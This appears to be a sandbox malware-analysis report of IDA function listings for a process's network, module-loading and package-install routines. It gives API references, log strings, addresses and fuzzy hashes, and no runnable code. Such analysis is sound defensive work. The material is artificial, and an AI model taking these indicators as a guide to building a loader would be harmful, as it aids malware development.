[D] (%s) -> Disconnected(sock=0x%llx), xrefs: 00007FFE11BDB535

Memory Dump Source

Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd

Similarity

API ID: ErrorLastrecv
String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
API String ID: 2514157807-65069805
Opcode ID: 0e96e8ceabe4403754de825ae533e2122814fe55cf48ca520f1a4bc828f32c8d
Instruction ID: 519e7b87ac0f09cfdb0f8408aca22e92d211060b493e009d0c07fdb0b872213c
Opcode Fuzzy Hash: 0e96e8ceabe4403754de825ae533e2122814fe55cf48ca520f1a4bc828f32c8d
Instruction Fuzzy Hash: 56115B60A0ED07D1EB399F17AA51EF812586F067B8F4033B4D82D8B6F1EE1CE9468300

Function 00007FFE1A4F479A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FFE1A4F47C2
WSAGetLastError.WS2_32 ref: 00007FFE1A4F47DC

Strings

[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFE1A4F483A
[D] (%s) -> Disconnected(sock=0x%llx), xrefs: 00007FFE1A4F4815
[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE1A4F47FD
tcp_recv, xrefs: 00007FFE1A4F47F6, 00007FFE1A4F480E, 00007FFE1A4F4833

Memory Dump Source

Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true

Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd

Similarity

API ID: ErrorLastrecv
String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
API String ID: 2514157807-65069805
Opcode ID: 20376f6619c6d822e54e35a81bb48bf82f03e739518884b6c6ac296e179b3acf
Instruction ID: 0453fb183b074e5b873558717156011bbba413495f8573f56bcaffa7ac2ff534
Opcode Fuzzy Hash: 20376f6619c6d822e54e35a81bb48bf82f03e739518884b6c6ac296e179b3acf
Instruction Fuzzy Hash: 20115B94B1CE4781F510571EAD402BA1250AF42FB2F5027F7DD2E46AF7DE1CA5668300

Function 00007FFE126E2ECA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FFE126E2EF2
WSAGetLastError.WS2_32 ref: 00007FFE126E2F0C

Strings

[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE126E2F2D
tcp_recv, xrefs: 00007FFE126E2F26, 00007FFE126E2F3E, 00007FFE126E2F63
[D] (%s) -> Disconnected(sock=0x%llx), xrefs: 00007FFE126E2F45
[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFE126E2F6A

Memory Dump Source

Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true

Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd

Similarity

API ID: ErrorLastrecv
String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
API String ID: 2514157807-65069805
Opcode ID: 9e45e7a5b1ac50202730f57c7db92283bb32a8ce1dd8794b84b20adfad986958
Instruction ID: 21964bd779bc3d01e1aed92f2361f058866c51f78a33d721dfb4a7306ad1a2fc
Opcode Fuzzy Hash: 9e45e7a5b1ac50202730f57c7db92283bb32a8ce1dd8794b84b20adfad986958
Instruction Fuzzy Hash: CB11A050A4CE4749FA10A327AC60AB81242AF457B4F4043B0EC2D8B6FAEFDCA946C301

Function 00007FFE1A521C0A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FFE1A521C32
WSAGetLastError.WS2_32 ref: 00007FFE1A521C4C

Strings

[D] (%s) -> Disconnected(sock=0x%llx), xrefs: 00007FFE1A521C85
[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE1A521C6D
[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFE1A521CAA
tcp_recv, xrefs: 00007FFE1A521C66, 00007FFE1A521C7E, 00007FFE1A521CA3

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: ErrorLastrecv
String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
API String ID: 2514157807-65069805
Opcode ID: cd545afe0dfbfab50491b437540348ee56eb87e0698422783fa0cfa3d5bf48f5
Instruction ID: 20a44901dd7018f25cea5f649d9c2d71df403690177191f709fc47478fc7f1da
Opcode Fuzzy Hash: cd545afe0dfbfab50491b437540348ee56eb87e0698422783fa0cfa3d5bf48f5
Instruction Fuzzy Hash: AE115E6CF0CE1681F6105757A84027626526FE7FB4F5013F7D82DA65F3EE2CA5868300

Function 00007FFE11EC25AA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FFE11EC25D2
WSAGetLastError.WS2_32 ref: 00007FFE11EC25EC

Strings

[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFE11EC264A
tcp_recv, xrefs: 00007FFE11EC2606, 00007FFE11EC261E, 00007FFE11EC2643
[D] (%s) -> Disconnected(sock=0x%llx), xrefs: 00007FFE11EC2625
[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE11EC260D

Memory Dump Source

Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: ErrorLastrecv
String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
API String ID: 2514157807-65069805
Opcode ID: 0a37630b3d380bdfb3f3fd602d5d7a95be8cc216344c10ecf61644671f1c9a02
Instruction ID: c1234c4bba00ae3bf777ca1c4c50d7e5f42740b075ed20207bd49dda22ee1675
Opcode Fuzzy Hash: 0a37630b3d380bdfb3f3fd602d5d7a95be8cc216344c10ecf61644671f1c9a02
Instruction Fuzzy Hash: A5116A90F0CD5351EB20A7A6AC503BB1248AF107B0F8053B0D92E9AAF1EE1CF9068302

Function 00007FF7C1AB2304 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,service,00000157C50713D0,00007FF7C1AB2910), ref: 00007FF7C1AB2312

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

GetLastError.KERNEL32(?,?,service,00000157C50713D0,00007FF7C1AB2910), ref: 00007FF7C1AB233E

Strings

service, xrefs: 00007FF7C1AB2305
module_load, xrefs: 00007FF7C1AB2326, 00007FF7C1AB234A
[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FF7C1AB2351
[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FF7C1AB232D

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load$service
API String ID: 4085810780-4145076245
Opcode ID: 5d0b695f5852fddfa45d31afa1b32bc7747efdcaaaff0dc5d86f6010d106ca8b
Instruction ID: 87aca54ebc00fb2f09ece82aa0eaf4b2c518eb14639e1bfc7fb2ac2a897d9d2d
Opcode Fuzzy Hash: 5d0b695f5852fddfa45d31afa1b32bc7747efdcaaaff0dc5d86f6010d106ca8b
Instruction Fuzzy Hash: 94F03A64A0A69780FB61FF5AA860CBCA6506F55BA8BC81133CC0C17751EEEDB586C320

Function 00007FFE11BDB87E Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFE11BDB890

Part of subcall function 00007FFE11BDC852: fwrite.MSVCRT ref: 00007FFE11BDC8FE
Part of subcall function 00007FFE11BDC852: fflush.MSVCRT ref: 00007FFE11BDC90A

Strings

Done, xrefs: 00007FFE11BDB89A
[I] (%s) -> %s, xrefs: 00007FFE11BDB8A8
net_init, xrefs: 00007FFE11BDB8A1, 00007FFE11BDB8C5
[E] (%s) -> WSAStartup failed(ret=%d), xrefs: 00007FFE11BDB8CF
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE11BDB8E4

Memory Dump Source

Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd

Similarity

API ID: Startupfflushfwrite
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
API String ID: 3771387389-898331216
Opcode ID: 5867243fe78a8a9678cdcbe041f3a43d3773ff52e058a36803f4b046501692db
Instruction ID: 272849c21ba807fdb220101a00c9d38687555604b0a553bc5bc31b2ce2eea036
Opcode Fuzzy Hash: 5867243fe78a8a9678cdcbe041f3a43d3773ff52e058a36803f4b046501692db
Instruction Fuzzy Hash: 82F04960B5EC02C1FF319F12E941FF95218AF003A8F4820BAC44E4A6B1EE5DE548C320

Function 00007FFE1A4F4B5E Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFE1A4F4B70

Part of subcall function 00007FFE1A4F1352: fwrite.MSVCRT ref: 00007FFE1A4F13FE
Part of subcall function 00007FFE1A4F1352: fflush.MSVCRT ref: 00007FFE1A4F140A

Strings

[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE1A4F4BC4
net_init, xrefs: 00007FFE1A4F4B81, 00007FFE1A4F4BA5
Done, xrefs: 00007FFE1A4F4B7A
[I] (%s) -> %s, xrefs: 00007FFE1A4F4B88
[E] (%s) -> WSAStartup failed(ret=%d), xrefs: 00007FFE1A4F4BAF

Memory Dump Source

Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true

Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd

Similarity

API ID: Startupfflushfwrite
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
API String ID: 3771387389-898331216
Opcode ID: 773791ad71c4f052d927a098ad043227365c511ca79b2662575fb19291f87604
Instruction ID: 6ccf72e08f831e918672014a46c37a50572e5fb2e601f24758023ee82e7c6c68
Opcode Fuzzy Hash: 773791ad71c4f052d927a098ad043227365c511ca79b2662575fb19291f87604
Instruction Fuzzy Hash: C7F01D60B0CD4791FB109B1AED453FA1210AF12FB9F4410F7D94E466B7EE1CE5599700

Function 00007FFE126E328E Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFE126E32A0

Part of subcall function 00007FFE126E2072: fwrite.MSVCRT ref: 00007FFE126E211E
Part of subcall function 00007FFE126E2072: fflush.MSVCRT ref: 00007FFE126E212A

Strings

net_init, xrefs: 00007FFE126E32B1, 00007FFE126E32D5
Done, xrefs: 00007FFE126E32AA
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE126E32F4
[E] (%s) -> WSAStartup failed(ret=%d), xrefs: 00007FFE126E32DF
[I] (%s) -> %s, xrefs: 00007FFE126E32B8

Memory Dump Source

Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true

Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd

Similarity

API ID: Startupfflushfwrite
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
API String ID: 3771387389-898331216
Opcode ID: 6f88879cea466673317dceab2be4fb4acada4a0518f6b3e7621b2704ff40c967
Instruction ID: 0ffeb89e2d5a09915f641c0cbae993332ffc4df1033b99d822f1cc7caf58a049
Opcode Fuzzy Hash: 6f88879cea466673317dceab2be4fb4acada4a0518f6b3e7621b2704ff40c967
Instruction Fuzzy Hash: 0DF01761B08D87D5FF11AB16EC653F82211AF543A4F8400B2D84D4A6FAEEEEE649C714

Function 00007FFE1A521FCE Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFE1A521FE0

Part of subcall function 00007FFE1A5277A2: fwrite.MSVCRT ref: 00007FFE1A52784E
Part of subcall function 00007FFE1A5277A2: fflush.MSVCRT ref: 00007FFE1A52785A

Strings

[E] (%s) -> WSAStartup failed(ret=%d), xrefs: 00007FFE1A52201F
net_init, xrefs: 00007FFE1A521FF1, 00007FFE1A522015
Done, xrefs: 00007FFE1A521FEA
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE1A522034
[I] (%s) -> %s, xrefs: 00007FFE1A521FF8

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: Startupfflushfwrite
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
API String ID: 3771387389-898331216
Opcode ID: 8c7461419add698801d5ed48bb0f19824aa43ec2136d0b0c711ea3f1ee45edd6
Instruction ID: d02b437ca398c3847a05d8b0807b4f5ae7d22795c90458068d83e49c7f9018ab
Opcode Fuzzy Hash: 8c7461419add698801d5ed48bb0f19824aa43ec2136d0b0c711ea3f1ee45edd6
Instruction Fuzzy Hash: 35F04968B1CC46D2FB109713E8003F51661AFA7FA5F4400F3C40D461B6EE6CE64A8700

Function 00007FFE115062AE Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFE115062C0

Part of subcall function 00007FFE115040D2: fwrite.MSVCRT ref: 00007FFE1150417E
Part of subcall function 00007FFE115040D2: fflush.MSVCRT ref: 00007FFE1150418A

Strings

[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE11506314
Done, xrefs: 00007FFE115062CA
[I] (%s) -> %s, xrefs: 00007FFE115062D8
[E] (%s) -> WSAStartup failed(ret=%d), xrefs: 00007FFE115062FF
net_init, xrefs: 00007FFE115062D1, 00007FFE115062F5

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: Startupfflushfwrite
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
API String ID: 3771387389-898331216
Opcode ID: 65cd0c52382f27a13dc80fb6b7acc97793f7c43f6e91f9d63a2dc8d564be2d70
Instruction ID: 3f0f561f0fcfcc076451c945d9eaa8b67a5c24ef006eb00f0265eefd6ce1f642
Opcode Fuzzy Hash: 65cd0c52382f27a13dc80fb6b7acc97793f7c43f6e91f9d63a2dc8d564be2d70
Instruction Fuzzy Hash: 3FF090A4B0DC0792FB129B56E8103F8125AAF003A0F4000BAD80D4A1B1EE9DE658C320

Function 00007FFE11EC296E Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFE11EC2980

Part of subcall function 00007FFE11EC9DC2: fwrite.MSVCRT ref: 00007FFE11EC9E6E
Part of subcall function 00007FFE11EC9DC2: fflush.MSVCRT ref: 00007FFE11EC9E7A

Strings

[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE11EC29D4
Done, xrefs: 00007FFE11EC298A
net_init, xrefs: 00007FFE11EC2991, 00007FFE11EC29B5
[E] (%s) -> WSAStartup failed(ret=%d), xrefs: 00007FFE11EC29BF
[I] (%s) -> %s, xrefs: 00007FFE11EC2998

Memory Dump Source

Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: Startupfflushfwrite
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
API String ID: 3771387389-898331216
Opcode ID: e3dde975791e3de8b401d5cfbee0aeead71d3cb9e73e6ec49a542f101dd95df3
Instruction ID: c930110f3009d4a667ed1e1bda237866eab9658782d227b5580edf3fb375176b
Opcode Fuzzy Hash: e3dde975791e3de8b401d5cfbee0aeead71d3cb9e73e6ec49a542f101dd95df3
Instruction Fuzzy Hash: 4AF017A1B0DE4391FF109B97EC453F62318AF107A4F8424B2D80E4A2B6EE2CE5498720

Function 00007FF7C1AB14EF Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C1AB1FD0: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF7C1AB162F), ref: 00007FF7C1AB1FEE

_mbscpy.MSVCRT ref: 00007FF7C1AB155C

Part of subcall function 00007FF7C1AB13CD: strlen.MSVCRT ref: 00007FF7C1AB13D8
Part of subcall function 00007FF7C1AB13CD: strlen.MSVCRT ref: 00007FF7C1AB13F4
Part of subcall function 00007FF7C1AB13CD: strlen.MSVCRT ref: 00007FF7C1AB1400

Strings

service, xrefs: 00007FF7C1AB14F0
[E] (%s) -> Failed(pkg_path=%s,tgt_path=%s,err=%08x), xrefs: 00007FF7C1AB1595
package_install, xrefs: 00007FF7C1AB158E, 00007FF7C1AB15FE
[I] (%s) -> Done(pkg_path=%s,tgt_path=%s), xrefs: 00007FF7C1AB1605

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: strlen$HandleModule_mbscpy
String ID: [E] (%s) -> Failed(pkg_path=%s,tgt_path=%s,err=%08x)$[I] (%s) -> Done(pkg_path=%s,tgt_path=%s)$package_install$service
API String ID: 3656010895-1379287937
Opcode ID: 400cfecd4f6eabefaae7f4a45cb318ea3c181757ab2ceb9ae91811f63d49ae76
Instruction ID: f187728d6019b7de0262aa6d25cc188d7a642668bd4ca9adc15296ac1a7571af
Opcode Fuzzy Hash: 400cfecd4f6eabefaae7f4a45cb318ea3c181757ab2ceb9ae91811f63d49ae76
Instruction Fuzzy Hash: 86316172A0C6C791FB10EF64E4907EEA361EB85364FC40533EA4E47685DEADD509C750

Function 00007FF7C1AB2283 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,00000000,00000157C50713D0,?,00007FF7C1AB292B), ref: 00007FF7C1AB22A3

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

GetLastError.KERNEL32(?,?,00000000,00000157C50713D0,?,00007FF7C1AB292B), ref: 00007FF7C1AB22D6

Strings

[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FF7C1AB22ED
module_get_proc, xrefs: 00007FF7C1AB22BC, 00007FF7C1AB22E6
[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FF7C1AB22C3

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
